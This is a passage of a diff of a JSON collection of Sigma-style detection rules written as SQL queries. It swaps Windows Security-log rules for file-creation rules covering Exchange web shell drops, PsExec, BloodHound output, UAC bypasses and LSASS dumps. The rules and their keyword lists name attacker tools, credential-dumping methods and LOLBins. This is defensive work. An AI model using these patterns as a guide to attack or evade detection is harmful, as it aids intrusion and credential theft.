'%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful 
exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR 
TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": 
"RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' 
AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": 
"4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - 
"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE 
'%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE 
'\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. 
Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - 
"attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + 
"SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 